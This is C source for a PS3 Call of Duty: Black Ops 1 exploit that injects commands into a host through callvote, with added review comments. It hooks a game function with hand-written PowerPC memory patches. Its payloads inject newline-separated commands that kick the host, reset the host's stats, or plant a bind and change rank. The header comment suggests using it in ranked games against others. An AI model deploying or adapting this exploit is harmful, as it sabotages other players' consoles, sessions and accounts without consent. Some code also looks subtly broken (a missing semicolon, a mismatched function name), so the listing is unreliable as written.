- /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
- Credits:
- http://old.zenhax.com/quake3-engine-callvote-bug-t686.html
- Luigi for documenting the Quake 3 callvote exploit
- 01cedricv2 for showing Quake documentation to Jo-Milk
- and Jo-Milk for porting to PS3
- This can be ported on Bo2 [Tested] and Other cods
- This infects the host once Vote passes to do so
- you need to join your friend in a private match
- He'll need to be the host:
- 1st way is:
- you tell him to go spectator and you spawn in and use cbuf_AddText
- 2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host
- this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
- */
- #define TOC 0x0072DCE8//1.13 per the author; hard-coded TOC value, presumably only valid for that one game build
- int var = 1;//payload selector read by the switch in MSG_WriteReliableCommand_Hook: 0, 1 or 2 pick a payload, any other value forwards the command unchanged
- int cbuf[] = { 0x00399CC8, TOC };//two words: a hard-coded address followed by the TOC value; looks like a hand-built function descriptor, TODO confirm
- void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;//function pointer set to the address of the cbuf array itself, not to 0x00399CC8 directly
- void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {//placeholder with the same parameter list as the hook; the hook calls it to forward commands
- __nop();//the seven nops do no work; they are presumably there to reserve code space, since HookFunctionStart writes 0x20 bytes to the functionStub address it is given
- __nop();
- __nop();
- __nop();
- __nop();
- __nop();
- __nop();
- }
- void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)//replacement passed to HookFunctionStart as newFunction; swaps one marker command for a payload and forwards every other command untouched
- {
- if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//exact-match test for the marker command; author's note: if it doesn't work, try pszBuffer
- {
- switch (var)//NOTE(review): each payload below places '\n' inside the quoted map argument, so it only has an effect on a host that does not reject newlines in callvote arguments
- {
- case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//payload 0: key bind plus stat change; author's note: RANK 50 not fully done
- case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//payload 1: author's note: kick host to XMB
- case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//payload 2: author's note: derank
- default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//unknown selector: forward the marker command as it was received
- }
- }
- else
- {
- MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);//not the marker: pass the command through unchanged
- }
- }
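- /*Basically the hook replaces ';' with '\n', which makes the host execute the whole line of dvars instead of just one,
- but in cbuf_AddText you keep the ';' so that the game does not execute the line of dvars on yourself. All of this depends on the host accepting a newline inside the quoted callvote argument; a host that rejects '\n', '\r' and ';' in vote arguments is not affected.*/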
- /*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
- cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");//queues the marker callvote whose text the strcmp in MSG_WriteReliableCommand_Hook looks for; uses ';' where the payloads use '\n'
- /*--------------------------------------------------Extra----------------------------------------------------------------------*/
- //read write syscalls
- int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)//thin wrapper around syscall 904, issued against the calling process; by its name it reads size bytes at address into data
- {
- system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);//argument order: own pid, address, size, buffer pointer
- return_to_user_prog(int32_t);//presumably returns the syscall status as int32_t; HookFunctionStart does not check it
- }
- template<typename T>//typed convenience wrapper over sys_dbg_read_process_memory
- int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
- {
- return sys_dbg_read_process_memory(address, &data, size);//NOTE(review): data is a by-value parameter, so &data is the address of this function's own copy; confirm what callers expect to get back
- }
- int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)//thin wrapper around syscall 905, issued against the calling process; by its name it writes size bytes from data to address
- {
- system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);//argument order: own pid, address, size, buffer pointer
- return_to_user_prog(int32_t);//presumably returns the syscall status as int32_t; HookFunctionStart does not check it
- }
- template<typename T>//typed convenience wrapper over sys_dbg_write_process_memory
- int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
- {
- return sys_dbg_write_process_memory(address, &value, size);//writes from the local copy of value; NOTE(review): size is caller-supplied and is not compared with sizeof(T)
- }
- void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)//patches the first 0x10 bytes at functionStartAddress to jump to newFunction and writes a 0x20-byte continuation to functionStub
- {
- uint32_t normalFunctionStub[8], hookFunctionStub[4];//8 words for the continuation, 4 words for the jump written over the function start
- sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);//copy the first four words of the target into slots 0-3; the return value is not checked
- normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);//lis r11 with the upper 16 bits of functionStartAddress + 0x10
- normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);//ori r11,r11 with the lower 16 bits of the same address
- normalFunctionStub[6] = 0x7D6903A6;//mtctr r11
- normalFunctionStub[7] = 0x4E800420;//bctr: continue in the target just past the four copied words
- sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);//store the copied words plus the jump back at functionStub
- hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);//lis r11 with the upper 16 bits of newFunction
- hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);//ori r11,r11 with the lower 16 bits of newFunction
- hookFunctionStub[2] = 0x7D6903A6;//mtctr r11
- hookFunctionStub[3] = 0x4E800420//bctr
- sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);//NOTE(review): this leaves a 16-byte in-memory modification of the target's code; comparing those bytes with the shipped binary would show it
- }
- HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);//installs the hook at the hard-coded address 0x3CCAF8 (presumably tied to the same build as TOC); passes the first 32-bit word read through each function symbol, presumably its code address, TODO confirm